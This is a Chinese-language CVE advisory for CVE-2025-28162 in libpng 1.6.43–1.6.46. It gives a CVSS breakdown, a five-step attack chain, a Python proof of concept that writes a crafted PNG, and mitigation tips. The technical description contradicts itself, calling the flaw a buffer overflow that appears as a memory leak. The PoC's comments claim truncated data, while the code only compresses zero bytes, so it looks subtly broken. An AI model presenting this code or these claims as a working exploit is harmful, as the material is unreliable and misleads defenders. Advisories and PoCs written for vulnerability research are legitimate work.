CVE-2025-28162 CVSS 5.5 中危

CVE-2025-28162 libpng缓冲区溢出漏洞导致拒绝服务

披露日期: 2026-01-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2025-28162

漏洞类型

缓冲区溢出

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

libpng

漏洞概述

CVE-2025-28162是libpng 1.6.43至1.6.46版本中的一个缓冲区溢出漏洞。该漏洞由于pngimage程序在处理PNG图像时存在内存管理问题，导致程序在使用AddressSanitizer(ASan)时发生内存泄漏。攻击者可以通过构造恶意的PNG图像文件，触发内存泄漏，使程序在多个位置持续泄漏内存，最终导致高内存使用和程序无响应。此漏洞属于本地攻击向量，需要低权限即可利用，无需用户交互即可触发。CVSS评分为5.5，属于中等严重程度，主要影响系统的可用性。

技术细节

该漏洞存在于libpng库的PNG图像处理功能中。当程序使用pngimage工具处理特制的PNG文件时，由于缓冲区边界检查不足，导致内存缓冲区溢出。在启用AddressSanitizer的构建中，这种溢出表现为内存泄漏。攻击者可以通过构造包含特定图像数据的PNG文件，使libpng在解析过程中分配超出预期的内存，并且在程序结束时未能正确释放这些内存。多次触发此漏洞会导致内存使用量持续增长，最终导致程序或系统资源耗尽而拒绝服务。漏洞影响libpng 1.6.43、1.6.44、1.6.45和1.6.46四个版本。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意构造数据的PNG图像文件，利用libpng处理图像时的缓冲区边界检查不足

STEP 2

步骤2

受害者使用存在漏洞的libpng 1.6.43-1.6.46版本程序（如pngimage）打开该PNG文件

STEP 3

步骤3

libpng在解析PNG图像时发生缓冲区溢出，导致内存泄漏

STEP 4

步骤4

程序内存使用量持续增长，在多个位置发生内存泄漏

STEP 5

步骤5

最终导致系统资源耗尽，程序无响应或系统崩溃，造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import struct
import zlib

def create_malicious_png():
    """
    Generate a malicious PNG file to trigger CVE-2025-28162
    This PoC creates a crafted PNG that causes memory leak in libpng 1.6.43-1.6.46
    """
    # PNG signature
    png_signature = b'\x89PNG\r\n\x1a\n'
    
    # IHDR chunk - Image header
    # Width: 10000, Height: 10000, Bit depth: 8, Color type: 2 (RGB)
    ihdr_data = struct.pack('>IIBBBBB', 10000, 10000, 8, 2, 0, 0, 0)
    ihdr_crc = zlib.crc32(b'IHDR' + ihdr_data) & 0xffffffff
    ihdr_chunk = struct.pack('>I', 13) + b'IHDR' + ihdr_data + struct.pack('>I', ihdr_crc)
    
    # IDAT chunk - Image data (truncated to trigger overflow)
    # Malformed compressed data that causes buffer issues
    raw_data = b'\x00' * 100000  # Large amount of filter bytes
    compressed_data = zlib.compress(raw_data)
    idat_crc = zlib.crc32(b'IDAT' + compressed_data) & 0xffffffff
    idat_chunk = struct.pack('>I', len(compressed_data)) + b'IDAT' + compressed_data + struct.pack('>I', idat_crc)
    
    # IEND chunk - Image end
    iend_crc = zlib.crc32(b'IEND') & 0xffffffff
    iend_chunk = struct.pack('>I', 0) + b'IEND' + struct.pack('>I', iend_crc)
    
    # Write malicious PNG
    with open('malicious_cve_2025_28162.png', 'wb') as f:
        f.write(png_signature + ihdr_chunk + idat_chunk + iend_chunk)
    
    print("Malicious PNG created: malicious_cve_2025_28162.png")
    print("Use with vulnerable libpng 1.6.43-1.6.46 and AddressSanitizer")

if __name__ == '__main__':
    create_malicious_png()

影响范围

libpng 1.6.43

libpng 1.6.44

libpng 1.6.45

libpng 1.6.46

防御指南

临时缓解措施

限制处理来自不可信来源的PNG文件，使用杀毒软件扫描上传的图像文件，监控系统内存使用情况，及时关注libpng官方安全公告并应用补丁。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表